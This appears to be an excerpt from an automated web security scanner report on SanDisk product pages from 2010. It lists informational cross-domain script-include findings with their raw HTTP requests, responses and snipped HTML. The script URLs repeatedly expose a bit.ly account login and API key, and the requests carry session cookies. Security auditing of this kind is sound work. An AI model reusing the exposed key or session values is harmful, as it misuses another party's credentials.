<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
s or have many important digital files, be sure to back them up with SanDisk Ultra.. Backup USB Flash Drive 64GB*. Protect your files with password protection and AES hardware encryption too.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-064G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">This button...s got your back; from first meeting to final presentation, you can be sure your business files, photos and videos are backed up ... at the touch of a button!
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-032G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
family memories are important to you, make sure you back them up. Now with SanDisk Ultra.. Backup USB Flash Drive 16GB*, simply back up your family photos and videos at the touch of a button!
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Also functioning as a regular USB flash drive, this one has added functionality: Simple backup at the touch of a button! No cables or software installation needed.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.153. http://www.sandisk.com/products/dslr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /products/dslr/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51591
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.154. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-compactflash-card

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-008G-A61&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-016G-A61&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-032G-A61&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-extreme-compactflash-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33022
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
in the glaciers of Antarctica or in the Saharan desert, you...ll capture exactly the shots you want with cards tested to perform under pressure, inside and out, even in extreme environments.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-032G-A61&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get the speed you need and take all your shots to the extreme...with the card made to capture all the action, all the time.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-016G-A61&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Start shooting like a pro and bring your best shots and high-def video to life.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX-008G-A61&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.155. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-iv-compactflash

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-016G-901&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-4096-901&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-8192-901&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-extreme-iv-compactflash HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31820
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">From Madagascar to Moscow. Wherever your next assignment takes you, a 16GB card gives you the room you need to keep up as the shots keep coming.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-016G-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Sometimes the perfect shot is the last one of the day. You...ll never come up short at the end of a long photo shoot when you...re armed with 8GB of capacity.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-8192-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
class="two">Because someone has to shoot the cover shot. When the perfect shot comes, you...ll be ready. With 4GB of space, you...ll never come up short when that career-making moment strikes.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFX4-4096-901&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.156. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-pro-compactflash-card

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-016G-A91&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-032G-A91&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-064G-A91&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
the power of the card worthy of your camera. Stress-tested for extreme shock, vibration, temperature and humidity, you can take your extended shots and video to the extreme...no matter what.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-064G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Built to keep up with your most demanding shoots...and non-stop bursts of creative vision...you...ll never miss a sequence or compromise even one shot.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-032G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Capture the exact shot that moves you with the memory card fast enough to keep up with your advanced DSLR.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-016G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.157. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-016G-A91&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-032G-A91&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-064G-A91&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33561
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
the power of the card worthy of your camera. Stress-tested for extreme shock, vibration, temperature and humidity, you can take your extended shots and video to the extreme...no matter what.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-064G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Built to keep up with your most demanding shoots...and non-stop bursts of creative vision...you...ll never miss a sequence or compromise even one shot.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-032G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Capture the exact shot that moves you with the memory card fast enough to keep up with your advanced DSLR.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFXP-016G-A91&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.158. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-sdhc-cards-

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-004G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-008G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-016G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-032G-A31&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-extreme-sdhc-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33196
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Perform in extreme conditions, from deserts to glaciers to beaches and back again, on standard high-capacity cards that let you take your shoots to the extreme.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-032G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Whether you...re snapping wedding shots, reunion pictures, or a fast motion sequence, you...ll capture the moment with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-016G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Seize the moment, no matter how long it lasts, with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-008G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more from your advanced camera and capture all your awesome shots with lightning-fast speed.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-004G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.159. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-compact-flash

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-002G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-004G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-ultra-compact-flash HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32730
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 16GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 8GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 4GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 2GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.160. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-ii-compactflash

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-002G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-004G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-ultra-ii-compactflash HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32618
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
h to capture the whole trip...even if reaching the summit or replacing your lost passport takes a few weeks longer than expected. Get the memory capacity your DSLR or advanced camera deserves.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Mountain biking anyone? Got a wedding to cover? Whatever you...re doing this weekend, get a card that can capture the views...and keep the bride happy...all day long.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Because there...s a wild kingdom in your backyard. Be ready to keep catch that turf war among the robins on a dependable 2GB card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.161. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-sdhc

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-004G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-032G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/dslr/sandisk-ultra-sdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:35 GMT
Connection: close

